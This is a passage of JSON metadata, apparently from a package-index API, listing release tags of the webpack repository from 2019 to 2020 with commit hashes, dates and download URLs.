000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/w